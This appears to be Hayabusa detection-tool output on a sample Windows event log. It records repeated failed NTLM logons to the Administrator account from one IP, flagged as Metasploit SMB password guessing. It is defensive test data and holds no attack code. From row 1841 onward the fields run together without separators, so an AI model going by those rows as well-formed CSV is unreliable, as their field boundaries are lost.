2016-09-20 01:50:22.193 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.223 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QoiMO6sSLOm4fOD5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.223 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xDjvMsa2IgR9KO7l : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.256 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.293 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SR7gVjxHZDYeK7pJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.293 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.323 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4jzGAepr7JeNKuuk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.323 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.368 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H9baxEeRCWjx6Fzr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.368 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.405 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Uy7aTt0B4ErguacA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.405 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.431 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nvKcLrUXqu2vTKO3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.431 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.486 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PLycXLeAU21pdnXL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.486 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.527 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SgwjJSKOPnurDWW4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.527 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YPDYdxPoQAl8aGMs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.564 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.594 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CX8knunlT6SMpmQw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.594 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.632 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AAjYbt50leZt3Xve : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.632 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.677 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3CD0HUCdg4UWOiji : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.677 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.709 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dkeWmTE1R1rYaYP8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.709 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.744 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: W87qcfSj4qWWUv4k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.744 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.830 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WUCyUQgbUqwaLj3J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.830 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.877 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q9nLhDbcvmVBZp4f : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.877 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.925 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BBWo1zDdjaAeGDWW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18412016-09-20 01:50:22.925 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18422016-09-20 01:50:22.960 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: vjHRFk2flmzzd1zg : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18432016-09-20 01:50:22.960 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18442016-09-20 01:50:23.000 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 53HYxs9s7fpP1y6V : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18452016-09-20 01:50:23.000 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18462016-09-20 01:50:23.035 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: tluqXKvVooP7VNyB : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18472016-09-20 01:50:23.035 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18482016-09-20 01:50:23.076 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 43m0nfi5tiv4TpSB : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18492016-09-20 01:50:23.076 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18502016-09-20 01:50:23.107 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: qjPyJXl984vViV6L : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18512016-09-20 01:50:23.107 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18522016-09-20 01:50:23.143 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: MomQ8Yt51VsMiO4p : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18532016-09-20 01:50:23.143 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18542016-09-20 01:50:23.175 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: LJYCi5r2otMHxA8f : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18552016-09-20 01:50:23.175 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18562016-09-20 01:50:23.211 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 4oUSkMBI8SGDLwYC : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18572016-09-20 01:50:23.211 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18582016-09-20 01:50:23.251 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: j1x3lyRjxn73KITB : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18592016-09-20 01:50:23.251 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18602016-09-20 01:50:23.283 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: gh05BhGpwq1ho62a : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18612016-09-20 01:50:23.283 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18622016-09-20 01:50:23.324 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: bxj6ITbiciyRNLbF : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18632016-09-20 01:50:23.324 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18642016-09-20 01:50:23.370 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: Uev2mjCaqHjm6NYi : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18652016-09-20 01:50:23.370 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18662016-09-20 01:50:23.415 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: L4WU383o9E5JyM5V : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18672016-09-20 01:50:23.415 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18682016-09-20 01:50:23.450 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: lfMv0lsoiRnTCFXe : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18692016-09-20 01:50:23.450 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18702016-09-20 01:50:23.504 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: XL4ahBqUyGeTONkE : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18712016-09-20 01:50:23.504 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18722016-09-20 01:50:23.549 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 8hJ888Kmyi6KqIPn : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18732016-09-20 01:50:23.549 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18742016-09-20 01:50:23.596 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: VZ6sfYMHuygnMdY2 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18752016-09-20 01:50:23.596 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18762016-09-20 01:50:23.636 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: XkuSlyTNc5OOoUtd : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18772016-09-20 01:50:23.636 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18782016-09-20 01:50:23.676 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 5Z13YmupcMato8Sd : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18792016-09-20 01:50:23.676 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18802016-09-20 01:50:23.733 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: JedeMnLPnRJEwhZ9 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18812016-09-20 01:50:23.733 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18822016-09-20 01:50:23.810 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: mmy0c0wFheIRzSo4 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18832016-09-20 01:50:23.810 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18842016-09-20 01:50:23.920 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: sskKdqku5S0f1sWm : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18852016-09-20 01:50:23.920 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18862016-09-20 01:50:23.962 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 15Qg0nCXNj7Ub1Sj : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18872016-09-20 01:50:23.962 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18882016-09-20 01:50:24.004 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: ZD6iuaqv70k69G87 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18892016-09-20 01:50:24.004 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18902016-09-20 01:50:24.051 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: gk3UuqTJmvH1snmN : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18912016-09-20 01:50:24.051 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18922016-09-20 01:50:24.092 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: zaw9iF5mJlyygdnB : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18932016-09-20 01:50:24.092 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18942016-09-20 01:50:24.128 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: Sr5PZAd1qMc7hi3c : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18952016-09-20 01:50:24.128 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18962016-09-20 01:50:24.167 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: l5xbQtyueVq3fJSG : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18972016-09-20 01:50:24.167 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18982016-09-20 01:50:24.203 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: g2nP0zz2ofBxTGw6 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18992016-09-20 01:50:24.203 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
